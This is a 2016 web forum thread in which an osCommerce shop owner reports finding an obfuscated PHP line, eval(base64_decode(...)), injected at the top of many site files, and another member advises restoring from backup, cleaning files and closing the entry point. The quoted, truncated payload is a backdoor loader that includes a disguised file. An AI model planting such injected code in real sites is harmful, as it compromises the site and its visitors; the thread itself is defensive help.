davidjohn Posted April 5, 2016 Share Posted April 5, 2016 I have 2 shopping website, i am planning to implement some custom code on oscommerce files so i download all my current files. but i got virus alert from my internet security suite {removed external link}, now i have in almost all settings files and administer php links this eval code at the beginning code <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pcHcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvY How to fix this issue ? Can i remove this code from all webpages ? Link to comment Share on other sites More sharing options...
Jack_mcs Posted April 5, 2016 Share Posted April 5, 2016 The best thing to do is to see if your host has a backup from before this happened. You can check the date on the files to see when it was done, usually. If they have a backup, then have them restore the whole directory. Have them remove or rename the current directory, not overwrite it because if they just restore files they may leave a file that was added. If they, or your, don't have a backup then you will need to remove that code from all of the files. If you sort the files by date, you may be able to find all that were changed or added more easily. That sort of injection isn't normal for recent oscommerce versions. But no matter the version, if you don't fix the way they got in, it will just happen again. I suggest you install SiteMonitor so that if it does happen again, you will be notified of it right away and have a record of what was changed and added. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.